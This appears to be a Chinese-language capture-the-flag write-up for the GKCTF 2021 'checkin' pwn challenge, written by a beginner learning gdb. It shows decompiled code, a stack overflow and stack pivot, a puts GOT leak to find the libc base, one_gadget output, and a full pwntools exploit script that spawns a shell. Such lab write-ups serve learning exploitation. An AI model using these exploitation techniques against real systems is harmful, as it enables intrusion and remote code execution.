[GKCTF 2021]checkin调试与分析

本文主要是介绍[GKCTF 2021]checkin调试与分析，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

        目前笔者刚刚开始入门PWN，算是通过这题涨了点见识吧

主要函数：

int sub_4018C7()
{char buf[32]; // [rsp+0h] [rbp-20h] BYREFputs("Please Sign-in");putchar(62);read(0, s1, 0x20uLL);puts("Please input u Pass");putchar(62);read(0, buf, 0x28uLL);if ( strncmp(s1, "admin", 5uLL) || sub_401974(buf) ){puts("Oh no");exit(0);}puts("Sign-in Success");return puts("BaileGeBai");
}

        sub_401974实为一个md5加密与对比函数，它会将buf进行md5后与固定值对比

__int64 __fastcall sub_401974(const char *a1)
{unsigned int v1; // eaxchar v3[96]; // [rsp+10h] [rbp-90h] BYREF__int64 v4[2]; // [rsp+70h] [rbp-30h]char v5[28]; // [rsp+80h] [rbp-20h] BYREFint i; // [rsp+9Ch] [rbp-4h]v4[0] = 0xA7A5577A292F2321LL;v4[1] = 0xC31F804A0E4A8943LL;sub_4007F6(v3);v1 = strlen(a1);sub_400842(v3, a1, v1);sub_400990(v3, v5);for ( i = 0; i <= 15; ++i ){if ( *(v4 + i) != v5[i] )return 1LL;}return 0LL;
}

        从对比方法开始说起吧，v4数组即为固定的md5值，比对方法为逐比特位对比

        

int main()
{INT64 v4[2];v4[0] = 0xA7A5577A292F2321;v4[1] = 0xC31F804A0E4A8943;BYTE k[16];for (int i = 0; i < 16; i++){k[i] = *((BYTE*)v4 + i);printf("%x", k[i]);}
}//21232f297a57a5a743894ae4a801fc3

         通过对比可以发现，这个得到的结果就是v4[0]与v4[1]按照比特位分别逆序后的拼接，底层的储存方式按照小端序而被IDA识别为代码中的整数

        以及，我们可以通过一些查询得到该md5为‘admin’的md5值

        那么只要我们输入两次admin，就能够顺利运行到loc_40195D处，便能够利用栈溢出了

.text:000000000040195D loc_40195D:                             ; CODE XREF: sub_4018C7+80↑j
.text:000000000040195D                 mov     edi, offset aSignInSuccess ; "Sign-in Success"
.text:0000000000401962                 call    _puts
.text:0000000000401967                 mov     edi, offset aBailegebai ; "BaileGeBai"
.text:000000000040196C                 call    _puts
.text:0000000000401971                 nop
.text:0000000000401972                 leave
.text:0000000000401973                 retn

        但这样还不够，程序调用的是read函数，有规定的读取上限

        特殊的，第二个read函数的读取上限高于buf的界定值，产生溢出，正好覆盖RBP处的值

        以及上一层在0x4018BF处调用该函数

.text:00000000004018BF                 call    sub_4018C7
.text:00000000004018C4                 nop
.text:00000000004018C5                 leave
.text:00000000004018C6                 retn

        当主要函数retn后，立刻进入第二次retn，存在栈迁移的可能

        那么可以照如下方式构造payload

pop_rdi=0x401ab3
puts=0x4018B5
puts_got=0x602028
name_addr=0x602400
payload1="admin".ljust(8,'\x00')+p64(pop_rdi)+p64(puts_got)+p64(puts)
payload2="admin".ljust(8,'\x00')+'a'*24+p64(name_addr)

        name_addr将会在执行

  read(0, buf, 0x28uLL);

        时将RBP覆盖，然后存在两层leave指令

        当到达第二次leave指令，就相当于如下指令执行

mov esp,ebp;esp=0x602400,ebp=0x602400
pop ebp ;esp=0x602408,ebp=0x602400

        此时再执行retn指令，就会返回到 pop_rdi 处，并按照payload1的顺序执行下去造成库地址泄露(注意，我使用的puts地址将会让我返回到 puts=0x4018b5+8 处，籍此再次进入主要函数)

        但第二次进入主要函数时候则不再像第一次那样容易了，因为这次的RBP与s1数组的位置很近，输入值将会造成覆盖(buf是从rbp-20h处开始的，而当我们再次到达第二个read的时候，rbp将会是0x602410，那么我们的输入值就会覆盖掉s1，导致常规的逐步构造无法成功)

char buf[32]; // [rsp+0h] [rbp-20h] BYREF

        但也有不需要那么多参数的方法来得到shell，这里可以用onegadget实现

a@ubuntu:~/Desktop/timu$ one_gadget ./libc.so.6
0x45226	execve("/bin/sh", rsp+0x30, environ)
constraints:rax == NULL0x4527a	execve("/bin/sh", rsp+0x30, environ)
constraints:[rsp+0x30] == NULL0xf03a4	execve("/bin/sh", rsp+0x50, environ)
constraints:[rsp+0x50] == NULL0xf1247	execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULL

        也就是说，只要我们得到了库的基地址，就可以用一行跳转直接得到shell，如果只有一行的话，就不用担心覆盖问题了，因此exp可以这样写

from pwn import *
context.log_level='debug'p=process("./login")
elf=ELF("./login")
libc=elf.libc
pop_rdi=0x401ab3
puts=0x4018B5
puts_got=0x602028
ret_addr=0x400641
name_addr=0x602400payload1="admin".ljust(8,'\x00')+p64(pop_rdi)+p64(puts_got)+p64(puts)
p.recvuntil('>')
p.send(payload1)
p.recvuntil('>')
payload2="admin".ljust(8,'\x00')+'a'*24+p64(name_addr)
p.send(payload2)libc_base=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
print hex(libc_base)payload3 = 'admin\x00\x00\x00'*3  +p64(0x4527a+libc_base)p.send(payload3)
p.recvuntil('>')#payload = 'admin\x00\x00\x00'*4 + p64( name_addr + 0x18 )
payload4 = 'admin\x00\x00\x00'*4 + p64( 0x602500 )
p.send(payload4)
p.interactive()

        值得注意的是，当笔者通过gdb附加调试之后发现，这一轮的跳转中，我们只会返回到payload3中的 p64(0x4527a+libc_base) 地址，和payload4中的地址已经没用太大关系了，只要保证payload4能够让程序返回即可

        但笔者还是在这里为payload4加上了一个地址

        正如上面所说，我们只需要用到一个返回地址即可，那倘若我们让程序第三次返回到puts=0x4018b5+8 处，这一次，RBP就会是payload4中的地址了，那么这样就能进入第三轮输入，这一次就不会出现覆盖问题，就能够像第一步的操作那样，让程序返回到system函数，将‘/bin/sh’的地址pop rdi了

后话：

        算是通过这一题学着怎么用gdb了，虽然用着还是很生涩，希望多做几题之后能渐渐熟练起来吧......不过多留心一下栈堆总是好的，用IDA动调的时候倒是很会看，一旦用起了gdb就容易忽视掉这些东西，还是要多留个心眼......

附一下参考的地址：

gdb查看指定地址内存内容：https://www.cnblogs.com/super119/archive/2011/03/26/1996125.html

[原创]pwn中one_gadget的使用技巧 ：https://bbs.pediy.com/thread-261112.htm

gdb的基本命令：https://blog.csdn.net/qq_26399665/article/details/81165684

这篇关于[GKCTF 2021]checkin调试与分析的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---